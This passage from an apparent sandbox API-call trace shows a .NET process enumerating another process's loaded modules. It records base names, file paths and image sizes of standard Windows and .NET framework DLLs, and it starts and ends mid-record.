lpmodinfo=0x2415aac, cb=0xc | out: lpmodinfo=0x2415aac*(lpBaseOfDll=0x69e40000, SizeOfImage=0x80000, EntryPoint=0x69e41180)) returned 1 [0142.027] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.027] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69e40000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0142.028] CoTaskMemFree (pv=0x55ab38) [0142.028] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.028] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69e40000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0142.029] CoTaskMemFree (pv=0x55ab38) [0142.029] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76680000, lpmodinfo=0x2417bec, cb=0xc | out: lpmodinfo=0x2417bec*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0142.029] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.029] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76680000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0142.030] CoTaskMemFree (pv=0x55ab38) [0142.030] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.030] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76680000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0142.031] CoTaskMemFree (pv=0x55ab38) [0142.031] GetModuleInformation (in: hProcess=0x2a0, hModule=0x676e0000, lpmodinfo=0x2419d00, cb=0xc | out: lpmodinfo=0x2419d00*(lpBaseOfDll=0x676e0000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0142.031] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.031] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x676e0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0142.032] CoTaskMemFree (pv=0x55ab38) [0142.032] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.032] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x676e0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0142.033] CoTaskMemFree (pv=0x55ab38) [0142.033] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69c40000, lpmodinfo=0x241be9c, cb=0xc | out: lpmodinfo=0x241be9c*(lpBaseOfDll=0x69c40000, SizeOfImage=0x18f000, EntryPoint=0x0)) returned 1 [0142.033] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.033] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69c40000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0142.034] CoTaskMemFree (pv=0x55ab38) [0142.034] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.034] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69c40000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")) returned 0x74 [0142.035] CoTaskMemFree (pv=0x55ab38) [0142.035] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66a70000, lpmodinfo=0x241e068, cb=0xc | out: lpmodinfo=0x241e068*(lpBaseOfDll=0x66a70000, SizeOfImage=0xc67000, EntryPoint=0x0)) returned 1 [0142.035] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.035] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66a70000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0142.036] CoTaskMemFree (pv=0x55ab38) [0142.036] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.036] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66a70000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")) returned 0x80 [0142.037] CoTaskMemFree (pv=0x55ab38) [0142.037] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6b4d0000, lpmodinfo=0x2420258, cb=0xc | out: lpmodinfo=0x2420258*(lpBaseOfDll=0x6b4d0000, SizeOfImage=0x92000, EntryPoint=0x6b4ddd60)) returned 1 [0142.037] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.037] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0142.038] CoTaskMemFree (pv=0x55ab38) [0142.038] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.038] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0142.039] CoTaskMemFree (pv=0x55ab38) [0142.039] GetModuleInformation (in: hProcess=0x2a0, hModule=0x72d30000, lpmodinfo=0x242241c, cb=0xc | out: lpmodinfo=0x242241c*(lpBaseOfDll=0x72d30000, SizeOfImage=0x20f000, EntryPoint=0x72ddb0a0)) returned 1 [0142.040] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.040] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x72d30000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0142.040] CoTaskMemFree (pv=0x55ab38) [0142.040] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.040] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x72d30000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")) returned 0x77 [0142.060] CoTaskMemFree (pv=0x55ab38) [0142.060] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73db0000, lpmodinfo=0x24246e8, cb=0xc | out: lpmodinfo=0x24246e8*(lpBaseOfDll=0x73db0000, SizeOfImage=0x1d000, EntryPoint=0x73db3b10)) returned 1 [0142.061] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.061] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73db0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0142.061] CoTaskMemFree (pv=0x55ab38) [0142.061] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.061] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73db0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0142.062] CoTaskMemFree (pv=0x55ab38) [0142.062] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66320000, lpmodinfo=0x24267f4, cb=0xc | out: lpmodinfo=0x24267f4*(lpBaseOfDll=0x66320000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0142.063] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.063] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66320000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0142.064] CoTaskMemFree (pv=0x55ab38) [0142.064] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.064] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66320000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0142.065] CoTaskMemFree (pv=0x55ab38) [0142.065] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66220000, lpmodinfo=0x24289b0, cb=0xc | out: lpmodinfo=0x24289b0*(lpBaseOfDll=0x66220000, SizeOfImage=0xf1000, EntryPoint=0x0)) returned 1 [0142.065] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.065] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66220000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Configuration.ni.dll") returned 0x1b [0142.066] CoTaskMemFree (pv=0x55ab38) [0142.066] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.066] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66220000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll")) returned 0x80 [0142.067] CoTaskMemFree (pv=0x55ab38) [0142.067] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65b00000, lpmodinfo=0x242aba0, cb=0xc | out: lpmodinfo=0x242aba0*(lpBaseOfDll=0x65b00000, SizeOfImage=0x71e000, EntryPoint=0x0)) returned 1 [0142.068] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.068] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65b00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Xml.ni.dll") returned 0x11 [0142.068] CoTaskMemFree (pv=0x55ab38) [0142.069] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.069] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65b00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")) returned 0x6c [0142.069] CoTaskMemFree (pv=0x55ab38) [0142.069] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764d0000, lpmodinfo=0x242cd54, cb=0xc | out: lpmodinfo=0x242cd54*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0142.070] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.070] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0142.071] CoTaskMemFree (pv=0x55ab38) [0142.071] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.071] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0142.072] CoTaskMemFree (pv=0x55ab38) [0142.072] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a50000, lpmodinfo=0x242ee58, cb=0xc | out: lpmodinfo=0x242ee58*(lpBaseOfDll=0x65a50000, SizeOfImage=0xa5000, EntryPoint=0x65a6ac50)) returned 1 [0142.075] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.075] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rasapi32.dll") returned 0xc [0142.076] CoTaskMemFree (pv=0x55ab38) [0142.076] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.076] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")) returned 0x20 [0142.077] CoTaskMemFree (pv=0x55ab38) [0142.077] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a20000, lpmodinfo=0x2430f6c, cb=0xc | out: lpmodinfo=0x2430f6c*(lpBaseOfDll=0x65a20000, SizeOfImage=0x23000, EntryPoint=0x65a25570)) returned 1 [0142.077] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.077] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a20000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0142.078] CoTaskMemFree (pv=0x55ab38) [0142.078] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.078] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a20000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")) returned 0x1e [0142.079] CoTaskMemFree (pv=0x55ab38) [0142.079] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a10000, lpmodinfo=0x2433078, cb=0xc | out: lpmodinfo=0x2433078*(lpBaseOfDll=0x65a10000, SizeOfImage=0x10000, EntryPoint=0x65a13820)) returned 1 [0142.080] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.080] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a10000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0142.081] CoTaskMemFree (pv=0x55ab38) [0142.081] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.081] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a10000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")) returned 0x1f [0142.082] CoTaskMemFree (pv=0x55ab38) [0142.082] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f30000, lpmodinfo=0x2435184, cb=0xc | out: lpmodinfo=0x2435184*(lpBaseOfDll=0x73f30000, SizeOfImage=0x5f000, EntryPoint=0x73f34af0)) returned 1 [0142.083] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.083] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f30000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ws2_32.dll") returned 0xa [0142.083] CoTaskMemFree (pv=0x55ab38) [0142.083] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.083] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f30000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0142.084] CoTaskMemFree (pv=0x55ab38) [0142.084] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71400000, lpmodinfo=0x2437290, cb=0xc | out: lpmodinfo=0x2437290*(lpBaseOfDll=0x71400000, SizeOfImage=0x4f000, EntryPoint=0x7140d850)) returned 1 [0142.085] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.085] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71400000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0142.086] CoTaskMemFree (pv=0x55ab38) [0142.086] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.086] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71400000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")) returned 0x1f [0142.087] CoTaskMemFree (pv=0x55ab38) [0142.087] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71450000, lpmodinfo=0x243939c, cb=0xc | out: lpmodinfo=0x243939c*(lpBaseOfDll=0x71450000, SizeOfImage=0x9b000, EntryPoint=0x7148f7e0)) returned 1 [0142.088] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.088] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71450000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="winhttp.dll") returned 0xb [0142.092] CoTaskMemFree (pv=0x55ab38) [0142.092] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.092] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71450000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")) returned 0x1f [0142.093] CoTaskMemFree (pv=0x55ab38) [0142.093] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71520000, lpmodinfo=0x243b4a8, cb=0xc | out: lpmodinfo=0x243b4a8*(lpBaseOfDll=0x71520000, SizeOfImage=0x12000, EntryPoint=0x71524510)) returned 1 [0142.094] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.094] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71520000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ondemandconnroutehelper.dll") returned 0x1b [0142.095] CoTaskMemFree (pv=0x55ab38) [0142.095] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.095] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71520000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")) returned 0x2f [0142.096] CoTaskMemFree (pv=0x55ab38) [0142.096] GetModuleInformation (in: hProcess=0x2a0, hModule=0x714f0000, lpmodinfo=0x243d5f4, cb=0xc | out: lpmodinfo=0x243d5f4*(lpBaseOfDll=0x714f0000, SizeOfImage=0x2f000, EntryPoint=0x714fbb70)) returned 1 [0142.097] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.097] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x714f0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0142.098] CoTaskMemFree (pv=0x55ab38) [0142.098] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.098] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x714f0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")) returned 0x20 [0142.099] CoTaskMemFree (pv=0x55ab38) [0142.099] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76900000, lpmodinfo=0x243f708, cb=0xc | out: lpmodinfo=0x243f708*(lpBaseOfDll=0x76900000, SizeOfImage=0x7000, EntryPoint=0x76901e10)) returned 1 [0142.100] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.100] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76900000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0142.101] CoTaskMemFree (pv=0x55ab38) [0142.101] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.101] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76900000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0142.102] CoTaskMemFree (pv=0x55ab38) [0142.102] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a860000, lpmodinfo=0x2441804, cb=0xc | out: lpmodinfo=0x2441804*(lpBaseOfDll=0x6a860000, SizeOfImage=0x13000, EntryPoint=0x6a8625d0)) returned 1 [0142.103] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.103] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a860000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0142.116] CoTaskMemFree (pv=0x55ab38) [0142.116] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.116] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a860000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")) returned 0x21 [0142.117] CoTaskMemFree (pv=0x55ab38) [0142.117] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a840000, lpmodinfo=0x2443918, cb=0xc | out: lpmodinfo=0x2443918*(lpBaseOfDll=0x6a840000, SizeOfImage=0x14000, EntryPoint=0x6a843c10)) returned 1 [0142.118] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.118] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a840000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0142.125] CoTaskMemFree (pv=0x55ab38) [0142.125] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.125] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a840000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")) returned 0x20 [0142.126] CoTaskMemFree (pv=0x55ab38) [0142.126] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74eb0000, lpmodinfo=0x2445a2c, cb=0xc | out: lpmodinfo=0x2445a2c*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0142.127] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.127] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74eb0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0142.128] CoTaskMemFree (pv=0x55ab38) [0142.128] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.128] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74eb0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0142.129] CoTaskMemFree (pv=0x55ab38) [0142.129] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76800000, lpmodinfo=0x2447b38, cb=0xc | out: lpmodinfo=0x2447b38*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0142.130] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.131] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76800000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0142.131] CoTaskMemFree (pv=0x55ab38) [0142.132] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.132] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76800000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0142.133] CoTaskMemFree (pv=0x55ab38) [0142.133] GetModuleInformation (in: hProcess=0x2a0, hModule=0x745b0000, lpmodinfo=0x2449c4c, cb=0xc | out: lpmodinfo=0x2449c4c*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0142.134] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.134] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x745b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0142.169] CoTaskMemFree (pv=0x55ab38) [0142.169] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.169] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x745b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0142.171] CoTaskMemFree (pv=0x55ab38) [0142.171] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74520000, lpmodinfo=0x244bd78, cb=0xc | out: lpmodinfo=0x244bd78*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0142.172] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.172] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74520000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0142.173] CoTaskMemFree (pv=0x55ab38) [0142.173] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.173] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74520000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0142.174] CoTaskMemFree (pv=0x55ab38) [0142.174] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76470000, lpmodinfo=0x244de84, cb=0xc | out: lpmodinfo=0x244de84*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0142.175] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.175] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76470000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0142.176] CoTaskMemFree (pv=0x55ab38) [0142.176] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.176] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76470000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0142.177] CoTaskMemFree (pv=0x55ab38) [0142.177] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f20000, lpmodinfo=0x244ff98, cb=0xc | out: lpmodinfo=0x244ff98*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0142.178] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.178] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f20000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0142.179] CoTaskMemFree (pv=0x55ab38) [0142.179] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.179] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f20000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0142.180] CoTaskMemFree (pv=0x55ab38) [0142.180] GetModuleInformation (in: hProcess=0x2a0, hModule=0x70a50000, lpmodinfo=0x24520a4, cb=0xc | out: lpmodinfo=0x24520a4*(lpBaseOfDll=0x70a50000, SizeOfImage=0x84000, EntryPoint=0x70a76530)) returned 1 [0142.181] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.182] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x70a50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0142.183] CoTaskMemFree (pv=0x55ab38) [0142.183] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.183] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x70a50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\DNSAPI.dll" (normalized: 